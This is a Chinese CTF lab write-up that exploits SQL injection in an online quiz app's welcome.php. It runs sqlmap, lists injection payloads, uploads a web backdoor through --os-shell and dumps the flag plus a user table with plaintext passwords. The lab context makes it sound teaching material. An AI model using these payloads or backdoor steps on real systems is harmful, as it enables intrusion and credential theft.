refer to:
https://yunjing.ichunqiu.com/cve/detail/750?type=1&pay=2
1. 先随意注册,然后进入到welcome页面,
2. 可以判断出参数n有问题:
3. 后面加上个' 试试,果然报错:
4. 所以可以直接使用SQLMAP弄出来:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm"
我们把payload放上去:
1. boolean based, blind, 基于bool的,盲注:
2 基于错误的:
3. time based, blind
4. union based
可以看到,除了第一个boolean based, 其他都是盲注,没有回显点。
使用sqlmap 的 -a 功能(下载全部,)发现内容太多了,就不等了。找到了flag的痕迹:
Database: information_schema Table: INNODB_SYS_DATAFILES [13 entries] +----------------------------------+---------+ | PATH | SPACE | +----------------------------------+---------+ | ./ctf/admin.ibd | 16 | | ./ctf/answer.ibd | 7 | | ./ctf/flag.ibd | 5 | | ./ctf/history.ibd | 8 | | ./ctf/options.ibd | 9 | | ./ctf/questions.ibd | 10 | | ./ctf/quiz.ibd | 11 | | ./ctf/rank.ibd | 12 | | ./ctf/user.ibd | 15 | | ./mysql/gtid_slave_pos.ibd | 4 | | ./mysql/innodb_index_stats.ibd | 2 | | ./mysql/innodb_table_stats.ibd | 1 | | ./mysql/transaction_registry.ibd | 3 | +----------------------------------+---------+
使用sqlmap 的 --os-shell功能:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm" --os-shell
___
__H__
___ ___[)]_____ ___ ___ {1.7.2.8#dev}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:30:57 /2023-04-08/
[09:31:00] [INFO] resuming back-end DBMS 'mysql'
[09:31:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: n (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=-6120' OR 4063=4063#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' OR (SELECT 8784 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(8784=8784,1))),0x717a766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NISw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' AND (SELECT 1822 FROM (SELECT(SLEEP(5)))NWDQ)-- ntru
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0' UNION ALL SELECT NULL,CONCAT(0x7162766b71,0x626150514c54736166766c617442464c6b6d78764b426661476f58674345517058476c624c5a6846,0x717a766b71),NULL,NULL,NULL#
---
[09:31:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:31:01] [INFO] going to use a web backdoor for command prompt
[09:31:01] [INFO] fingerprinting the back-end DBMS operating system
[09:31:01] [WARNING] reflective value(s) found and filtering out
[09:31:01] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[09:31:05] [INFO] retrieved the web server document root: '/var/www'
[09:31:05] [INFO] retrieved web server absolute paths: '/var/www/html/welcome.php'
[09:31:05] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[09:31:05] [WARNING] unable to upload the file stager on '/var/www/'
[09:31:05] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[09:31:05] [WARNING] expect junk characters inside the file as a leftover from UNION query
[09:31:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[09:31:06] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[09:31:06] [WARNING] unable to upload the file stager on '/var/www/html/'
[09:31:06] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[09:31:06] [INFO] the remote file '/var/www/html/tmpukcjn.php' is larger (709 B) than the local file '/tmp/sqlmapdyonyo1w3766/tmp84m96lde' (705B)
[09:31:07] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com:80/tmpukcjn.php
[09:31:07] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com:80/tmpbfyjf.php
[09:31:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> who
do you want to retrieve the command standard output? [Y/n/a]
No output
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output: '/var/www/html'
os-shell> ll
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'sh: 1: ll: not found'
os-shell> ls -al
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 120
drwxrwxrwx 1 www-data www-data 4096 Apr 8 01:31 .
drwxr-xr-x 1 root root 4096 Jul 9 2019 ..
-rwxrwxrwx 1 root root 11357 Jun 4 2018 LICENSE
-rwxrwxrwx 1 root root 789 Jun 4 2018 README.md
-rwxrwxrwx 1 root root 3298 Jul 15 2019 admin.php
drwxrwxrwx 1 root root 4096 Jul 9 2022 css
-rwxrwxrwx 1 root root 14621 Jul 15 2019 dashboard.php
-rwxrwxrwx 1 root root 120 Jul 6 2022 database.php
drwxrwxrwx 1 root root 4096 Jul 9 2022 fonts
drwxrwxrwx 1 root root 4096 Jul 9 2022 image
-rwxrwxrwx 1 root root 1135 Jun 4 2018 index.php
drwxrwxrwx 1 root root 4096 Jul 9 2022 js
-rwxrwxrwx 1 root root 3189 Jun 4 2018 login.php
-rwxrwxrwx 1 root root 127 Jun 4 2018 logout.php
-rwxrwxrwx 1 root root 132 Jun 4 2018 logout1.php
-rwxrwxrwx 1 root root 3648 Jun 4 2018 register.php
drwxrwxrwx 1 root root 4096 Jul 9 2022 scripts
-rwxr-xr-x 1 www-data www-data 866 Apr 8 01:31 tmpbfyjf.php
-rw-r--r-- 1 mysql mysql 0 Apr 8 01:31 tmpujmxa.php
-rw-r--r-- 1 mysql mysql 709 Apr 8 01:31 tmpukcjn.php
-rwxrwxrwx 1 root root 6881 Feb 25 2021 update.php
-rwxrwxrwx 1 root root 11673 Jun 4 2018 welcome.php
---
os-shell> cat welcome.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
include_once 'database.php';
session_start();
if(!(isset($_SESSION['email'])))
{
header("location:login.php");
}
else
{
$name = $_SESSION['name'];
$email = $_SESSION['email'];
include_once 'database.php';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Welcome | Online Quiz System</title>
<link rel="stylesheet" href="css/bootstrap.min.css"/>
<link rel="stylesheet" href="css/bootstrap-theme.min.css"/>
<link rel="stylesheet" href="css/welcome.css">
<link rel="stylesheet" href="css/font.css">
<script src="js/jquery.js" type="text/javascript"></script>
<script src="js/bootstrap.min.js" type="text/javascript"></script>
</head>
<body>
<nav class="navbar navbar-default title1">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"><b>Online Quiz System</b></a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav navbar-left">
<li <?php if(@$_GET['q']==1) echo'class="active"'; ?> ><a href="welcome.php?q=1"><span class="glyphicon glyphicon-home" aria-hidden="true"></span> Home<span class="sr-only">(current)</span></a></li>
<li <?php if(@$_GET['q']==2) echo'class="active"'; ?>> <a href="welcome.php?q=2"><span class="glyphicon glyphicon-list-alt" aria-hidden="true"></span> History</a></li>
<li <?php if(@$_GET['q']==3) echo'class="active"'; ?>> <a href="welcome.php?q=3"><span class="glyphicon glyphicon-stats" aria-hidden="true"></span> Ranking</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li <?php echo''; ?> > <a href="logout.php?q=welcome.php"><span class="glyphicon glyphicon-log-out" aria-hidden="true"></span> Log out</a></li>
</ul>
</div>
</div>
</nav>
<br><br>
<div class="container">
<div class="row">
<div class="col-md-12">
<?php if(@$_GET['q']==1)
{
$result = mysqli_query($con,"SELECT * FROM quiz ORDER BY date DESC") or die('Error');
echo '<div class="panel"><div class="table-responsive"><table class="table table-striped title1">
<tr><td><center><b>S.N.</b></center></td><td><center><b>Topic</b></center></td><td><center><b>Total question</b></center></td><td><center><b>Marks</center></b></td><td><center><b>Action</b></center></td></tr>';
$c=1;
while($row = mysqli_fetch_array($result)) {
$title = $row['title'];
$total = $row['total'];
$sahi = $row['sahi'];
$eid = $row['eid'];
$q12=mysqli_query($con,"SELECT score FROM history WHERE eid='$eid' AND email='$email'" )or die('Error98');
$rowcount=mysqli_num_rows($q12);
if($rowcount == 0){
echo '<tr><td><center>'.$c++.'</center></td><td><center>'.$title.'</center></td><td><center>'.$total.'</center></td><td><center>'.$sahi*$total.'</center></td><td><center><b><a href="welcome.php?q=quiz&step=2&eid='.$eid.'&n=1&t='.$total.'" class="btn sub1" style="color:black;margin:0px;background:#1de9b6"><span class="glyphicon glyphicon-new-window" aria-hidden="true"></span> <span class="title1"><b>Start</b></span></a></b></center></td></tr>';
}
else
{
echo '<tr style="color:#99cc32"><td><center>'.$c++.'</center></td><td><center>'.$title.' <span title="This quiz is already solve by you" class="glyphicon glyphicon-ok" aria-hidden="true"></span></center></td><td><center>'.$total.'</center></td><td><center>'.$sahi*$total.'</center></td><td><center><b><a href="update.php?q=quizre&step=25&eid='.$eid.'&n=1&t='.$total.'" class="pull-right btn sub1" style="color:black;margin:0px;background:red"><span class="glyphicon glyphicon-repeat" aria-hidden="true"></span> <span class="title1"><b>Restart</b></span></a></b></center></td></tr>';
}
}
$c=0;
echo '</table></div></div>';
}?>
<?php
if(@$_GET['q']== 'quiz' && @$_GET['step']== 2)
{
$eid=@$_GET['eid'];
$sn=@$_GET['n'];
$total=@$_GET['t'];
$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );
echo '<div class="panel" style="margin:5%">';
while($row=mysqli_fetch_array($q) )
{
$qns=$row['qns'];
$qid=$row['qid'];
echo '<b>Question '.$sn.' ::<br /><br />'.$qns.'</b><br /><br />';
}
$q=mysqli_query($con,"SELECT * FROM options WHERE qid='$qid' " );
echo '<form action="update.php?q=quiz&step=2&eid='.$eid.'&n='.$sn.'&t='.$total.'&qid='.$qid.'" method="POST" class="form-horizontal">
<br />';
while($row=mysqli_fetch_array($q) )
{
$option=$row['option'];
$optionid=$row['optionid'];
echo'<input type="radio" name="ans" value="'.$optionid.'"> '.$option.'<br /><br />';
}
echo'<br /><button type="submit" class="btn btn-primary"><span class="glyphicon glyphicon-lock" aria-hidden="true"></span> Submit</button></form></div>';
}
if(@$_GET['q']== 'result' && @$_GET['eid'])
{
$eid=@$_GET['eid'];
$q=mysqli_query($con,"SELECT * FROM history WHERE eid='$eid' AND email='$email' " )or die('Error157');
echo '<div class="panel">
<center><h1 class="title" style="color:#660033">Result</h1><center><br /><table class="table table-striped title1" style="font-size:20px;font-weight:1000;">';
while($row=mysqli_fetch_array($q) )
{
$s=$row['score'];
$w=$row['wrong'];
$r=$row['sahi'];
$qa=$row['level'];
echo '<tr style="color:#66CCFF"><td>Total Questions</td><td>'.$qa.'</td></tr>
<tr style="color:#99cc32"><td>right Answer <span class="glyphicon glyphicon-ok-circle" aria-hidden="true"></span></td><td>'.$r.'</td></tr>
<tr style="color:red"><td>Wrong Answer <span class="glyphicon glyphicon-remove-circle" aria-hidden="true"></span></td><td>'.$w.'</td></tr>
<tr style="color:#66CCFF"><td>Score <span class="glyphicon glyphicon-star" aria-hidden="true"></span></td><td>'.$s.'</td></tr>';
}
$q=mysqli_query($con,"SELECT * FROM rank WHERE email='$email' " )or die('Error157');
while($row=mysqli_fetch_array($q) )
{
$s=$row['score'];
echo '<tr style="color:#990000"><td>Overall Score <span class="glyphicon glyphicon-stats" aria-hidden="true"></span></td><td>'.$s.'</td></tr>';
}
echo '</table></div>';
}
?>
<?php
if(@$_GET['q']== 2)
{
$q=mysqli_query($con,"SELECT * FROM history WHERE email='$email' ORDER BY date DESC " )or die('Error197');
echo '<div class="panel title">
<table class="table table-striped title1" >
<tr style="color:black;"><td><center><b>S.N.</b></center></td><td><center><b>Quiz</b></center></td><td><center><b>Question Solved</b></center></td><td><center><b>Right</b></center></td><td><center><b>Wrong<b></center></td><td><center><b>Score</b></center></td>';
$c=0;
while($row=mysqli_fetch_array($q) )
{
$eid=$row['eid'];
$s=$row['score'];
$w=$row['wrong'];
$r=$row['sahi'];
$qa=$row['level'];
$q23=mysqli_query($con,"SELECT title FROM quiz WHERE eid='$eid' " )or die('Error208');
while($row=mysqli_fetch_array($q23) )
{ $title=$row['title']; }
$c++;
echo '<tr><td><center>'.$c.'</center></td><td><center>'.$title.'</center></td><td><center>'.$qa.'</center></td><td><center>'.$r.'</center></td><td><center>'.$w.'</center></td><td><center>'.$s.'</center></td></tr>';
}
echo'</table></div>';
}
if(@$_GET['q']== 3)
{
$q=mysqli_query($con,"SELECT * FROM rank ORDER BY score DESC " )or die('Error223');
echo '<div class="panel title"><div class="table-responsive">
<table class="table table-striped title1" >
<tr style="color:red"><td><center><b>Rank</b></center></td><td><center><b>Name</b></center></td><td><center><b>Email</b></center></td><td><center><b>Score</b></center></td></tr>';
$c=0;
while($row=mysqli_fetch_array($q) )
{
$e=$row['email'];
$s=$row['score'];
$q12=mysqli_query($con,"SELECT * FROM user WHERE email='$e' " )or die('Error231');
while($row=mysqli_fetch_array($q12) )
{
$name=$row['name'];
}
$c++;
echo '<tr><td style="color:black"><center><b>'.$c.'</b></center></td><td><center>'.$name.'</center></td><td><center>'.$e.'</center></td><td><center>'.$s.'</center></td></tr>';
}
echo '</table></div></div>';
}
?>
</body>
</html>
---
最后,我们来拿flag:
进入到sql-shell:
python sqlmap.py -u "http://eci-2ze2v95f49wasfbwy36u.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&t=100&n=0" -p "n" -v 1 --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1680592615,1680743198,1680907041; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1680915151; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=8a1dd572910d3c8cc54ff01ff591b5570f28d854; PHPSESSID=jgksjv5p592uciahhhq8ggufbm" --sql-shell
[09:40:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:40:23] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
[09:40:27] [INFO] fetching SQL SELECT statement query output: 'show databases'
[09:40:27] [WARNING] reflective value(s) found and filtering out
[09:40:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
sql-shell> use ctf;
[09:40:34] [INFO] fetching SQL query output: 'use ctf'
sql-shell> show tables;
[09:40:41] [INFO] fetching SQL SELECT statement query output: 'show tables'
sql-shell> select * from ctf.flag;
[09:40:57] [INFO] fetching SQL SELECT statement query output: 'select * from ctf.flag'
[09:40:57] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:40:57] [INFO] fetching columns for table 'flag' in database 'ctf'
[09:40:57] [INFO] the query with expanded column name(s) is: SELECT flag FROM ctf.flag
select * from ctf.flag: 'flag{0613f4db-cc9c-4db4-8614-900d8c8bb353}'
sql-shell> select * from flag;
[09:41:11] [INFO] fetching SQL SELECT statement query output: 'select * from flag'
[09:41:11] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:11] [INFO] fetching current database
[09:41:11] [INFO] fetched table columns from database 'ctf'
[09:41:11] [INFO] the query with expanded column name(s) is: SELECT flag FROM flag
select * from flag: 'flag{0613f4db-cc9c-4db4-8614-900d8c8bb353}'
sql-shell> select * from admin;
[09:41:16] [INFO] fetching SQL SELECT statement query output: 'select * from admin'
[09:41:16] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:16] [INFO] fetching current database
[09:41:16] [INFO] fetching columns for table 'admin' in database 'ctf'
[09:41:16] [INFO] retrieved: 'admin_id','int(11)'
[09:41:17] [INFO] retrieved: 'email','varchar(50)'
[09:41:17] [INFO] retrieved: 'password','varchar(500)'
[09:41:17] [INFO] the query with expanded column name(s) is: SELECT admin_id, email, password FROM admin
select * from admin: '1'
sql-shell> select * from user;
[09:41:39] [INFO] fetching SQL SELECT statement query output: 'select * from user'
[09:41:39] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[09:41:39] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:41:39] [INFO] fetching current database
[09:41:39] [INFO] fetching columns for table 'user' in database 'ctf'
[09:41:39] [INFO] retrieved: 'name','varchar(50)'
[09:41:40] [INFO] retrieved: 'college','varchar(100)'
[09:41:40] [INFO] retrieved: 'email','varchar(50)'
[09:41:40] [INFO] retrieved: 'password','varchar(50)'
[09:41:40] [INFO] the query with expanded column name(s) is: SELECT college, email, name, password FROM user
[09:41:40] [INFO] retrieved: '88888888','[email protected]','aaa','88888888'
[09:41:40] [INFO] retrieved: 'kcc','[email protected]','janobe sourcecode','jan'
[09:41:40] [INFO] retrieved: 'National Institute of Science and Technology, Berhampur','[email protected]','Swagatika Padhi','pinky'
[09:41:40] [INFO] retrieved: 'National Institute of Science and Technology, Berhampur','[email protected]','Priyanka Pattnaik','pinka'
select * from user [4]:
[*] 88888888, [email protected], aaa, 88888888
[*] kcc, [email protected], janobe sourcecode, jan
[*] National Institute of Science and Technology, Berhampur, [email protected], Swagatika Padhi, pinky
[*] National Institute of Science and Technology, Berhampur, [email protected], Priyanka Pattnaik, pinka
不但拿到了flag , 还看到了其它的一些信息,有意思吧!
噔噔蹬蹬!!!
